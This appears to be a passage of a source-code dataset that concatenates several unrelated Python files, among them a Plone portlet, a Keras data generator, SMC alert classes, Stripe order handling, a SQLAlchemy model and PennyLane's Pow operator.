= schema.Bool(\n title=_(u'label_show_title',\n default=u\"Show title\"),\n description=_(u'help_show_title',\n default=u\"Show title of this portlet.\"),\n required=True,\n default=True)\n\n category = schema.Choice(\n title=_(u'label_actions_category',\n default=u\"Actions category\"),\n description=_(u'help_actions_category',\n default=u\"Select an action category\"),\n required=True,\n vocabulary='plone.app.vocabularies.Actions')\n\n show_icons = schema.Bool(\n title=_(u'label_show_icons',\n default=u\"Show icons\"),\n description=_(u'help_show_icons',\n default=u\"Show icons or default icon for actions without icon.\"),\n required=True,\n default=True)\n\n default_icon = schema.ASCIILine(\n title=_(u'label_default_icon',\n default=u\"Default icon\"),\n description=_(u'help_default_icon',\n default=u\"What icon we should use for actions with no specific icons. 
A 16*16 pixels image.\"),\n required=False,\n default='action_icon.png')\n\n\nclass Assignment(base.Assignment):\n \"\"\"Portlet assignment.\n This is what is actually managed through the portlets UI and associated\n with columns.\n \"\"\"\n\n implements(IActionsPortlet)\n\n ptitle = u\"\"\n show_title = True\n category = u\"\"\n show_icons = True\n default_icon = 'action_icon.png'\n\n def __init__(self, ptitle=u\"\", show_title=True, category=u\"\", show_icons=True, default_icon='action_icon.png'):\n self.ptitle = ptitle\n self.show_title = show_title\n self.category = category\n self.show_icons = show_icons\n self.default_icon = default_icon\n return\n\n @property\n def title(self):\n \"\"\"This property is used to give the title of the portlet in the\n \"manage portlets\" screen.\n \"\"\"\n return _(u\"Actions portlet\") + ' \"%s\"' % (self.ptitle or self.category)\n\n\nclass Renderer(base.Renderer):\n \"\"\"Actions portlet renderer.\"\"\"\n\n render = ViewPageTemplateFile('actions.pt')\n\n @property\n def available(self):\n \"\"\"Override base class\"\"\"\n return bool(self.actionLinks())\n\n @property\n def title(self):\n \"\"\"Portlet title\"\"\"\n\n return self.data.ptitle\n\n @property\n def showTitle(self):\n \"\"\"Show portlet title\"\"\"\n return self.data.show_title\n\n def actionLinks(self):\n \"\"\"Features of action links\"\"\"\n return self.cachedLinks(self.data.category, self.data.default_icon,\n self.data.show_icons)\n\n @pm_view.memoize\n def cachedLinks(self, actions_category, default_icon, show_icons):\n context_state = getMultiAdapter((aq_inner(self.context), self.request),\n name=u'plone_context_state')\n HAS_PLONE4 = False\n try:\n actions = context_state.actions(actions_category)\n HAS_PLONE4 = True\n except TypeError: # Plone < 4\n actions = context_state.actions()\n\n # Finding method for icons\n# if show_icons:\n# portal_actionicons = getToolByName(self.context, 'portal_actionicons')\n# def render_icon(category, action, default):\n# if action.has_key('icon') and action['icon']:\n# # We have an icon *in* this action\n# return action['icon']\n# # Otherwise we look for an icon in portal_actionicons\n# if category != 'object_buttons':\n# return portal_actionicons.renderActionIcon(category, action['id'], default)\n# else:\n# # object_buttons\n# plone_utils = getToolByName(self.context, 'plone_utils')\n# return plone_utils.getIconFor(category, action['id'], default)\n# else:\n def render_icon(category, action_id, default):\n # We don't show icons whatever\n return None\n\n # Building the result as list of dicts\n result = []\n\n if actions_category == \"portal_tabs\":\n # Special case for portal_tabs (we rely on content in Plone root)\n portal_tabs_view = getMultiAdapter(\n (self.context, self.context.REQUEST), name='portal_tabs_view')\n actions = portal_tabs_view.topLevelTabs(actions=actions)\n for action in actions:\n link = {\n 'id':action['id'],\n 'url': action['url'],\n 'title': action['name'],\n 'icon': render_icon(\n actions_category,\n action,\n default=default_icon)\n }\n result.append(link)\n\n else:\n if actions_category == 'object_buttons':\n actions_tool = getMultiAdapter((aq_inner(self.context), self.context.request), name=u'plone_tools').actions()\n actions = actions_tool.listActionInfos(object=aq_inner(self.context), categories=(actions_category,))\n elif not HAS_PLONE4:\n actions = actions.get(actions_category, [])\n for action in actions:\n if not (action['available']\n and action['visible']\n and action['allowed']\n and action['url']):\n continue\n 
link = {\n 'id': action['id'],\n 'url': action['url'],\n 'title': action['title'],\n 'icon': render_icon(\n actions_category,\n action,\n default=default_icon),\n 'modal': action.get('modal'),\n }\n result.append(link)\n return result\n\n\nclass AddForm(base.AddForm):\n \"\"\"Portlet add form.\n This is registered in configure.zcml. The schema attribute tells\n plone.autoform which fields to display. The create() method actually\n constructs the assignment that is being added.\n \"\"\"\n schema = IActionsPortlet\n label = _(u'heading_add_actions_portlet',\n default=u'Add actions portlet')\n description = _(u'help_add_actions_portlet',\n default=u'An action portlet displays actions from a category')\n\n def create(self, data):\n return Assignment(**data)\n\n\nclass EditForm(base.EditForm):\n \"\"\"Portlet edit form.\n\n This is registered with configure.zcml. The schema attribute tells\n plone.autoform which fields to display.\n \"\"\"\n schema = IActionsPortlet\n","sub_path":"buildout-cache/eggs/plone.app.portlets-3.0.5-py2.7.egg/plone/app/portlets/portlets/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":7533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"1658529","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 4 20:44:11 2014\n\n@author: ericguichet\n\"\"\"\n\n# import the modules\n\nfrom scipy.integrate import odeint\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# function definitions\n\ndef F(X,t):\n vm=1.5\n vc=8.0\n vecteur_CM=np.array([vm*t-X[0],-X[1]])\n return vc*vecteur_CM/np.linalg.norm(vecteur_CM)\n\n# main program\n\nX0=np.array([100,300])\nt=np.linspace(0,38,100)\nX=odeint(F,X0,t)\nplt.axis([0,100,0,300])\nplt.plot(X[:,0],X[:,1])\nplt.savefig('trajectoire_du_chien.png')\nplt.show()\n","sub_path":"Exercices/31_equadiffs/maitre_chien/syst_diff_chien_maitre.py","file_name":"syst_diff_chien_maitre.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"108884799","text":"import keras\nimport numpy as np\nimport pandas as pd\n\nMAX_UID = 73421\nMAX_JID = 100\nUCATS = ['u' + str(i+1) for i in range(MAX_UID)]\nJCATS = ['j' + str(i+1) for i in range(MAX_JID)]\n\nnp.random.seed(9999)\n\n# Original code by Afshine Amidi & Shervine Amidi from\n# https://stanford.edu/~shervine/blog/keras-how-to-generate-data-on-the-fly\nclass DataGenerator(keras.utils.Sequence):\n 'Generate data batch by batch for 73,421 categorical input NN'\n def __init__(self, train, batch_size=4096, shuffle=True):\n 'Initialization'\n self.train = train\n self.batch_size = batch_size\n self.shuffle = shuffle\n self.indexes = None\n self.on_epoch_end()\n\n def __len__(self):\n 'Denotes the number of batches per epoch'\n return int(np.floor(self.train.shape[0] / self.batch_size))\n\n def __getitem__(self, index):\n 'Generate one batch of data'\n # get the batch DF subset; index = 0, 1, 2, ...\n indexes = self.indexes[index*self.batch_size:(index+1)*self.batch_size]\n df = self.train.iloc[indexes, :]\n\n # Dummify user and joke IDs for this DF subset\n # u_dummies = pd.get_dummies(df['uID'], prefix='u', prefix_sep='')\n # j_dummies = pd.get_dummies(df['jID'], prefix='j', prefix_sep='')\n # u_dummies = u_dummies.reindex(columns=UCATS, fill_value=0)\n # j_dummies = j_dummies.reindex(columns=JCATS, fill_value=0)\n #\n # X = pd.concat([u_dummies, j_dummies], 1).values\n # y = df.iloc[:,2].values\n\n X = [df.uID, 
df.jID]\n y = df.iloc[:, 2]\n\n return X, y\n\n def on_epoch_end(self):\n 'Updates indexes after each epoch'\n self.indexes = np.arange(self.train.shape[0])\n if self.shuffle:\n np.random.shuffle(self.indexes)\n\n","sub_path":"mlp/DataGenerator.py","file_name":"DataGenerator.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"531039953","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\"\"\"\nAlert element types that can be used as matching criteria in the rules of an Alert Policy.\n\"\"\"\nfrom smc.api.exceptions import AlertChainError, UnsupportedAlertChannel, AlertPolicyError\nfrom smc.base.model import Element, ElementCreator, SubElement\nfrom smc.base.util import element_resolver\n\n\nclass AlertElement(Element):\n \"\"\"\n Base alert element.\n \"\"\"\n\n\nclass CustomAlert(AlertElement):\n \"\"\"\n This represents a custom Alert.\n It gives the name and description to an Alert Event. The Alert element can be used\n as a matching criterion in the rules of an Alert Policy.\n\n Create an alert::\n\n CustomAlert.create('myalert')\n \"\"\"\n\n typeof = \"alert\"\n\n @classmethod\n def create(cls, name, comment=None):\n \"\"\"\n Create the custom alert\n\n :param str name: name of custom alert\n :param str comment: optional comment\n :raises CreateElementFailed: failed creating element with reason\n :return: instance with meta\n :rtype: CustomAlert\n \"\"\"\n json = {\"name\": name, \"comment\": comment}\n\n return ElementCreator(cls, json)\n\n\nclass FwAlert(AlertElement):\n \"\"\"\n This represents a predefined Firewall Alert.\n It gives the name and description to an Alert Event. The Alert element can be used\n as a matching criterion in the rules of an Alert Policy.\n \"\"\"\n\n typeof = \"fw_alert\"\n\n\nclass IdsAlert(AlertElement):\n \"\"\"\n This represents a predefined IDS Alert.\n It gives the name and description to an Alert Event. The Alert element can be used\n as a matching criterion in the rules of an Alert Policy.\n \"\"\"\n\n typeof = \"ids_alert\"\n\n\nclass AlertChain(Element):\n \"\"\"\n This represents an Alert Chain.\n \"\"\"\n typeof = \"alert_chain\"\n\n @classmethod\n def create(cls, name, final_action=None, alert_chain_ref=None, comment=None):\n \"\"\"\n Create the alert chain\n :param str name: name of alert chain\n :param str comment: optional comment\n :param str final_action: optional final_action\n possible values:\n 1)none: stop policy processing without acknowledging.\n 2)acknowledge: stop policy processing and acknowledge.\n 3)redirect: redirect to another alert chain.\n 4)return: return to the next policy rule.\n :param obj alert_chain_ref: The redirect alert chain. 
object of AlertChain.\n :raises CreateElementFailed: failed creating element with reason\n :return: instance with meta of alert chain\n :rtype: AlertChain\n \"\"\"\n json = {\"name\": name, \"final_action\": final_action, \"comment\": comment}\n if final_action == 'redirect':\n json.update(alert_chain_ref=alert_chain_ref)\n\n return ElementCreator(cls, json)\n\n @property\n def final_action(self):\n return self.data.get(\"final_action\", None)\n\n @property\n def open(self):\n self.make_request(href=self.get_relation(\"open\"), method=\"create\")\n\n @property\n def save(self):\n self.make_request(href=self.get_relation(\"save\"), method=\"create\")\n\n @property\n def alert_chain_rules(self):\n return [AlertChainRule(**rule) for rule in self.make_request(resource=\"alert_chain_rules\")]\n\n def add_alert_chain_rule(self, name, alert_channel=None, destination=None, delay=0,\n admin_name=[], amount=None, notify_first_block=0, period=0,\n comment=None):\n AlertChainRule.create(self, name, alert_channel, destination, delay, admin_name,\n amount, notify_first_block, period, comment)\n\n\nclass AlertChainRule(SubElement):\n \"\"\"\n This represents an Alert Chain Rule for an Alert Chain Policy.\n \"\"\"\n typeof = \"alert_chain_rule\"\n\n @staticmethod\n def create(self, name, alert_channel=None, destination=None, delay=0, admin_name=[],\n amount=None, notify_first_block=0, period=0, comment=None):\n \"\"\"\n :param object self: object of AlertChain.\n :param str name: name of alert chain rule.\n :param str alert_channel: The alert channel; the default is the Delay channel. Valid values are below:\n smtp: SMTP channel.\n sms: SMS channel.\n snmp: SNMP channel.\n custom_script: Custom script channel.\n delay: Delay channel.\n user_notification: User notification channel.\n :param str destination: destination address\n :param int delay: The delay before the next notification, in minutes.\n :param list admin_name: List of admin users. Used in the case of User notification channel.\n :param int amount: The maximum number of notifications to be sent before activating\n moderation.\n :param int notify_first_block: Indicates whether we shall notify the first blocked\n notification upon moderation activation.\n :param int period: The period during which notifications are tracked before activating\n moderation. 
The period must be specified in minutes.\n :param str comment: description of the element.\n :raises CreateElementFailed: failed creating element with reason\n :return: instance with meta of alert chain rule\n :rtype: AlertChainRule\n \"\"\"\n if alert_channel not in ['smtp', 'sms', 'snmp', 'custom_script', 'user_notification',\n 'delay'] and alert_channel:\n raise UnsupportedAlertChannel(\n \"Failed to create an alert chain rule due to an unsupported alert channel {}\".\n format(alert_channel))\n json = {\n \"name\": name,\n \"alert_channel\": alert_channel,\n \"delay\": delay,\n \"period\": period,\n \"notify_first_block\": notify_first_block,\n \"admin_name\": admin_name,\n \"comment\": comment\n }\n if amount:\n json.update(amount=amount)\n if destination:\n json.update(destination=destination)\n return ElementCreator(\n AlertChainRule,\n exception=AlertChainError,\n href=self.get_relation(\"alert_chain_rules\"),\n json=json,\n )\n\n\nclass AlertPolicy(Element):\n \"\"\"\n This represents an Alert Policy.\n \"\"\"\n typeof = \"alert_policy\"\n\n @classmethod\n def create(cls, name, comment=None):\n \"\"\"\n Create the alert policy\n :param str name: name of alert policy\n :param str comment: optional comment\n :raises CreateElementFailed: failed creating element with reason\n :return: instance with meta of alert policy\n :rtype: AlertPolicy\n \"\"\"\n json = {\"name\": name, \"comment\": comment}\n return ElementCreator(cls, json)\n\n @property\n def alert_rules(self):\n return [AlertRule(**rule) for rule in self.make_request(resource=\"alert_rules\")]\n\n def add_alert_rule(self, name, alert_chain_ref=None, match_sender_ref=[],\n alert_and_situation_ref=[], min_severity=1, max_severity=10,\n rule_validity_times=[], comment=None):\n \"\"\"\n Creates an element of type alert_rule.\n :param object self: object of AlertPolicy.\n :param str name: name of alert rule.\n :param str(AlertChain) alert_chain_ref: The Alert Chain.\n :param str match_sender_ref: The senders. If empty, it is considered as ANY.\n :param list alert_and_situation_ref: The alerts and situations. If empty, it is considered\n as ANY.\n :param int min_severity: The minimum value for the severity (value between 1 and 10)\n :param int max_severity: The maximum value for the severity (value between 1 and 10)\n :param list rule_validity_times: Restricts the rule's validity to a specific time period. During the\n specified time period, the rule matches. Outside the specified time period, the rule\n does not match and the matching continues to the next rule.\n :param str comment: description of the element.\n :raises CreateElementFailed: failed creating element with reason\n :return: instance with meta of alert rule\n :rtype: AlertRule\n \"\"\"\n return AlertRule.create(self, name, alert_chain_ref, match_sender_ref,\n alert_and_situation_ref,\n min_severity, max_severity, rule_validity_times, comment)\n\n\nclass AlertRule(SubElement):\n \"\"\"\n This represents an Alert Rule for an Alert Policy.\n \"\"\"\n typeof = \"alert_rule\"\n\n @staticmethod\n def create(self, name, alert_chain_ref=None, match_sender_ref=[], alert_and_situation_ref=[],\n min_severity=1, max_severity=10, rule_validity_times=[], comment=None):\n \"\"\"\n Creates an element of type alert_rule.\n :param object self: object of AlertPolicy.\n :param str name: name of alert rule.\n :param str(AlertChain) alert_chain_ref: The Alert Chain.\n :param str match_sender_ref: The senders. If empty, it is considered as ANY.\n :param list alert_and_situation_ref: The alerts and situations. 
If empty, it is considered\n as ANY.\n :param int min_severity: The minimum value for the severity (value between 1 and 10): Matches\n the rule to only Situations with the specified Severity value(s). For example, if your\n rule is general and matches a wide range of Situations, you may want to create two\n similar rules: one for less severe Situations and one for more severe Situations. Useful\n in rules that contain Tags in the Situation cell.\n :param int max_severity: The maximum value for the severity (value between 1 and 10): Matches\n the rule to only Situations with the specified Severity value(s). For example, if your\n rule is general and matches a wide range of Situations, you may want to create two\n similar rules: one for less severe Situations and one for more severe Situations. Useful\n in rules that contain Tags in the Situation cell.\n :param list rule_validity_times: Restricts the rule's validity to a specific time period. During the\n specified time period, the rule matches. Outside the specified time period, the rule\n does not match and the matching continues to the next rule.\n :param str comment: description of the element.\n :raises CreateElementFailed: failed creating element with reason\n :return: instance with meta of alert rule\n :rtype: AlertRule\n \"\"\"\n params = {}\n json = {\n \"name\": name,\n \"match_sender_ref\": element_resolver(match_sender_ref),\n \"alert_and_situation_ref\": element_resolver(alert_and_situation_ref),\n \"rule_validity_times\": element_resolver(rule_validity_times),\n \"min_severity\": min_severity,\n \"max_severity\": max_severity,\n \"comment\": comment\n }\n if alert_chain_ref:\n json.update(alert_chain_ref=element_resolver(alert_chain_ref))\n return ElementCreator(\n AlertRule,\n exception=AlertPolicyError,\n href=self.get_relation(\"alert_rules\"),\n params=params,\n json=json,\n )\n","sub_path":"smc/elements/alerts.py","file_name":"alerts.py","file_ext":"py","file_size_in_byte":11879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"443385210","text":"from django_slack import slack_message\nimport stripe\n\nfrom django.db import transaction\n\nfrom ironcage.stripe_integration import create_charge_for_order\n\nfrom .mailer import send_order_confirmation_mail\nfrom .models import Order\n\nimport structlog\nlogger = structlog.get_logger()\n\n\ndef create_pending_order(purchaser, adult_name, adult_email_addr, adult_phone_number, accessibility_reqs, dietary_reqs, unconfirmed_details):\n logger.info('children.actions.create_pending_order', purchaser=purchaser.id)\n with transaction.atomic():\n return Order.objects.create_pending(\n purchaser=purchaser,\n adult_name=adult_name,\n adult_phone_number=adult_phone_number,\n adult_email_addr=adult_email_addr,\n accessibility_reqs=accessibility_reqs,\n dietary_reqs=dietary_reqs,\n unconfirmed_details=unconfirmed_details,\n )\n\n\ndef update_pending_order(order, adult_name, adult_email_addr, adult_phone_number, accessibility_reqs, dietary_reqs, unconfirmed_details):\n logger.info('children:update_pending_order', order=order.order_id)\n with transaction.atomic():\n order.update(adult_name, adult_email_addr, adult_phone_number, accessibility_reqs, dietary_reqs, unconfirmed_details)\n\n\ndef process_stripe_charge(order, token):\n logger.info('children:process_stripe_charge', order=order.order_id, token=token)\n assert order.payment_required()\n try:\n charge = create_charge_for_order(order, token)\n confirm_order(order, charge.id, charge.created)\n except 
stripe.error.CardError as e:\n mark_order_as_failed(order, e._message)\n\n\ndef confirm_order(order, charge_id, charge_created):\n logger.info('children:confirm_order', order=order.order_id, charge_id=charge_id)\n with transaction.atomic():\n order.confirm(charge_id, charge_created)\n send_receipt(order)\n slack_message('children/order_created.slack', {'order': order})\n\n\ndef mark_order_as_failed(order, charge_failure_reason):\n logger.info('children:mark_order_as_failed', order=order.order_id, charge_failure_reason=charge_failure_reason)\n with transaction.atomic():\n order.mark_as_failed(charge_failure_reason)\n\n\ndef send_receipt(order):\n logger.info('children:send_receipt', order=order.order_id)\n send_order_confirmation_mail(order)\n","sub_path":"children/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"466595208","text":"import warnings\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split \nfrom sklearn.tree import DecisionTreeClassifier \nfrom sklearn.metrics import accuracy_score \nfrom sklearn.metrics import classification_report \nfrom sklearn.preprocessing import LabelEncoder\n \n#warnings.filterwarnings('ignore')\ndf_ = pd.read_csv('ProjectUpdate2-Dataset.csv')\n\ntype_df = df_.filter(items = ['REPO_TYPE','SECU_FLAG'])\nspace_df = df_.filter(items = ['ADD_LOC', 'DEL_LOC', 'TOT_LOC', 'SECU_FLAG'])\ntime_df = df_.filter(items = ['PRIOR_AGE', 'SECU_FLAG'])\n\n#Space-based\nx = df_.filter(items = ['ADD_LOC', 'DEL_LOC', 'TOT_LOC'])\ny = df_.filter(items = ['SECU_FLAG'])\n \nx_train, x_test, y_train, y_test = train_test_split(x, y)\n\n#Training\ntrained_gini = DecisionTreeClassifier(criterion = \"gini\")\ntrained_gini.fit(x_train, y_train)\ntrained_entropy = DecisionTreeClassifier(criterion = \"entropy\")\ntrained_entropy.fit(x_train, y_train)\n\n#Results\nprint(\"Results Using Gini Index:\") \ny_pred_gini = trained_gini.predict(x_test) \n\nprint(\"Accuracy:\")\nprint(accuracy_score(y_test,y_pred_gini)*100) \n \nprint(\"Report :\") \nprint(classification_report(y_test, y_pred_gini)) \n \nprint(\"Results Using Entropy:\") \ny_pred_entropy = trained_entropy.predict(x_test) \n\nprint(\"Accuracy:\")\nprint(accuracy_score(y_test,y_pred_entropy)*100) \n \nprint(\"Report :\") \nprint(classification_report(y_test, y_pred_entropy))","sub_path":"Project Update #2/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"309212217","text":"from db import db\n\n\nclass MedicalObservationModel(db.Model):\n __tablename__ = 'medical_observations'\n\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n title = db.Column(db.String(255), nullable=False)\n description = db.Column(db.Text, nullable=False)\n health_state = db.Column(db.Text, nullable=False)\n\n patient_id = db.Column(db.Integer, db.ForeignKey('patients.id'))\n patient = db.relationship('PatientModel', uselist=False)\n\n doctor_id = db.Column(db.Integer, db.ForeignKey('doctors.id'))\n doctor = db.relationship('DoctorModel', uselist=False)\n\n medical_service_id = db.Column(db.Integer, db.ForeignKey('medical_services.id'))\n # 'MedicalServiceModel' is the assumed model name for the medical_services table; the original mistakenly reused 'DoctorModel'\n medical_service = db.relationship('MedicalServiceModel', uselist=False)\n\n def __init__(self, title, description, health_state, patient_id: int, doctor_id: int, medical_service_id: int) -> None:\n self.title 
= title\n self.description = description\n self.health_state = health_state\n self.patient_id = patient_id\n self.doctor_id = doctor_id\n self.medical_service_id = medical_service_id # the original accepted this argument but never stored it\n\n def json(self):\n return {\n 'title': self.title,\n 'description': self.description,\n 'health_state': self.health_state,\n 'patient_id': self.patient_id,\n 'doctor_id': self.doctor_id,\n }\n\n def save_to_db(self):\n db.session.add(self)\n db.session.commit()\n","sub_path":"models/medical_observation.py","file_name":"medical_observation.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"99684343","text":"# Copyright 2018-2022 Xanadu Quantum Technologies Inc.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nThis submodule defines the symbolic operation that stands for the power of an operator.\n\"\"\"\nimport copy\nfrom typing import Union\n\nfrom scipy.linalg import fractional_matrix_power\n\nimport pennylane as qml\nfrom pennylane import math as qmlmath\nfrom pennylane.operation import (\n DecompositionUndefinedError,\n Observable,\n Operation,\n PowUndefinedError,\n SparseMatrixUndefinedError,\n expand_matrix,\n)\nfrom pennylane.ops.identity import Identity\nfrom pennylane.queuing import QueuingContext, apply\nfrom pennylane.wires import Wires\n\nfrom .symbolicop import SymbolicOp\n\n_superscript = str.maketrans(\"0123456789.+-\", \"⁰¹²³⁴⁵⁶⁷⁸⁹⋅⁺⁻\")\n\n\n# pylint: disable=no-member\nclass PowOperation(Operation):\n \"\"\"Operation-specific methods and properties for the ``Pow`` class.\n\n Dynamically mixed in based on the provided base operator. If the base operator is an\n Operation, this class will be mixed in.\n\n When we no longer rely on certain functionality through `Operation`, we can get rid of this\n class.\n \"\"\"\n\n # until we add gradient support\n grad_method = None\n\n def inv(self):\n self.hyperparameters[\"z\"] *= -1\n self._name = f\"{self.base.name}**{self.z}\"\n return self\n\n @property\n def inverse(self):\n return False\n\n @inverse.setter\n def inverse(self, boolean):\n if boolean is True:\n raise NotImplementedError(\"The inverse can not be set for a power operator\")\n\n @property\n def base_name(self):\n return self._name\n\n @property\n def name(self):\n return self._name\n\n # pylint: disable=missing-function-docstring\n @property\n def basis(self):\n return self.base.basis\n\n @property\n def control_wires(self):\n return self.base.control_wires\n\n\nclass Pow(SymbolicOp):\n \"\"\"Symbolic operator denoting an operator raised to a power.\n\n Args:\n base (~.operation.Operator): the operator to be raised to a power\n z=1 (float): the exponent\n\n **Example**\n\n >>> sqrt_x = Pow(qml.PauliX(0), 0.5)\n >>> sqrt_x.decomposition()\n [SX(wires=[0])]\n >>> qml.matrix(sqrt_x)\n array([[0.5+0.5j, 0.5-0.5j],\n [0.5-0.5j, 0.5+0.5j]])\n >>> qml.matrix(qml.SX(0))\n array([[0.5+0.5j, 0.5-0.5j],\n [0.5-0.5j, 0.5+0.5j]])\n >>> qml.matrix(Pow(qml.T(0), 1.234))\n array([[1. +0.j , 0. +0.j ],\n [0. 
+0.j , 0.56597465+0.82442265j]])\n\n \"\"\"\n\n _operation_type = None # type if base inherits from operation and not observable\n _operation_observable_type = None # type if base inherits from both operation and observable\n _observable_type = None # type if base inherits from observable and not operation\n\n # pylint: disable=unused-argument\n def __new__(cls, base=None, z=1, do_queue=True, id=None):\n \"\"\"Mixes in parents based on inheritance structure of base.\n\n Though all the types will be named \"Pow\", their *identity* and location in memory will be\n different based on ``base``'s inheritance. We cache the different types in private class\n variables so that each dynamically created class only needs to be constructed once.\n \"\"\"\n\n if isinstance(base, Operation):\n if isinstance(base, Observable):\n if cls._operation_observable_type is None:\n base_classes = (PowOperation, Pow, SymbolicOp, Observable, Operation)\n cls._operation_observable_type = type(\"Pow\", base_classes, dict(cls.__dict__))\n return object.__new__(cls._operation_observable_type)\n\n # not an observable\n if cls._operation_type is None:\n base_classes = (PowOperation, Pow, SymbolicOp, Operation)\n cls._operation_type = type(\"Pow\", base_classes, dict(cls.__dict__))\n return object.__new__(cls._operation_type)\n\n if isinstance(base, Observable):\n if cls._observable_type is None:\n base_classes = (Pow, SymbolicOp, Observable)\n cls._observable_type = type(\"Pow\", base_classes, dict(cls.__dict__))\n return object.__new__(cls._observable_type)\n\n return object.__new__(Pow)\n\n def __init__(self, base=None, z=1, do_queue=True, id=None):\n\n # incorporate base inverse attribute into the exponent\n if getattr(base, \"inverse\", False):\n base.inverse = False\n z *= -1\n\n self.hyperparameters[\"z\"] = z\n self._name = f\"{base.name}**{z}\"\n\n super().__init__(base, do_queue=do_queue, id=id)\n\n @property\n def z(self):\n \"\"\"The exponent.\"\"\"\n return self.hyperparameters[\"z\"]\n\n @property\n def batch_size(self):\n return self.base.batch_size\n\n @property\n def ndim_params(self):\n return self.base.ndim_params\n\n def label(self, decimals=None, base_label=None, cache=None):\n z_string = format(self.z).translate(_superscript)\n return self.base.label(decimals, base_label, cache=cache) + z_string\n\n def matrix(self, wire_order=None):\n base_matrix = self.base.matrix()\n\n if isinstance(self.z, int):\n mat = qmlmath.linalg.matrix_power(base_matrix, self.z)\n else:\n mat = fractional_matrix_power(base_matrix, self.z)\n\n if wire_order is None or self.wires == Wires(wire_order):\n return mat\n\n return expand_matrix(mat, wires=self.wires, wire_order=wire_order)\n\n # pylint: disable=arguments-differ\n @staticmethod\n def compute_sparse_matrix(*params, base=None, z=0):\n if isinstance(z, int):\n base_matrix = base.compute_sparse_matrix(*params, **base.hyperparameters)\n return base_matrix**z\n raise SparseMatrixUndefinedError\n\n def decomposition(self):\n try:\n return self.base.pow(self.z)\n except PowUndefinedError as e:\n if isinstance(self.z, int) and self.z > 0:\n if QueuingContext.recording():\n return [apply(self.base) for _ in range(self.z)]\n return [copy.copy(self.base) for _ in range(self.z)]\n # TODO: consider: what if z is an int and less than 0?\n # do we want Pow(base, -1) to be a \"more fundamental\" op\n raise DecompositionUndefinedError from e\n\n def diagonalizing_gates(self):\n r\"\"\"Sequence of gates that diagonalize the operator in the computational basis.\n\n Given the eigendecomposition :math:`O = U \\Sigma U^{\\dagger}` where\n 
:math:`\\Sigma` is a diagonal matrix containing the eigenvalues,\n the sequence of diagonalizing gates implements the unitary :math:`U`.\n\n The diagonalizing gates of an operator raised to a power are the same as the diagonalizing\n gates of the original operator. As we can see,\n\n .. math::\n\n O^2 = U \\Sigma U^{\\dagger} U \\Sigma U^{\\dagger} = U \\Sigma^2 U^{\\dagger}\n\n This formula can be extended to inversion and any rational number.\n\n The diagonalizing gates rotate the state into the eigenbasis\n of the operator.\n\n A ``DiagGatesUndefinedError`` is raised if no representation by decomposition is defined.\n\n .. seealso:: :meth:`~.Operator.compute_diagonalizing_gates`.\n\n Returns:\n list[.Operator] or None: a list of operators\n \"\"\"\n return self.base.diagonalizing_gates()\n\n def eigvals(self):\n base_eigvals = self.base.eigvals()\n return [value**self.z for value in base_eigvals]\n\n def generator(self):\n r\"\"\"Generator of an operator that is in single-parameter-form.\n\n The generator of a power operator is ``z`` times the generator of the\n base matrix.\n\n .. math::\n\n U(\\phi)^z = e^{i\\phi (z G)}\n\n See also :func:`~.generator`\n \"\"\"\n return self.z * self.base.generator()\n\n def simplify(self) -> Union[\"Pow\", Identity]:\n try:\n ops = self.base.pow(z=self.z)\n if not ops:\n return (\n qml.prod(*(qml.Identity(w) for w in self.wires))\n if len(self.wires) > 1\n else qml.Identity(self.wires[0])\n )\n op = qml.prod(*ops) if len(ops) > 1 else ops[0]\n return op.simplify()\n except PowUndefinedError:\n return Pow(base=self.base.simplify(), z=self.z)\n","sub_path":"pennylane/ops/op_math/pow_class.py","file_name":"pow_class.py","file_ext":"py","file_size_in_byte":8965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"464062298","text":"#! 
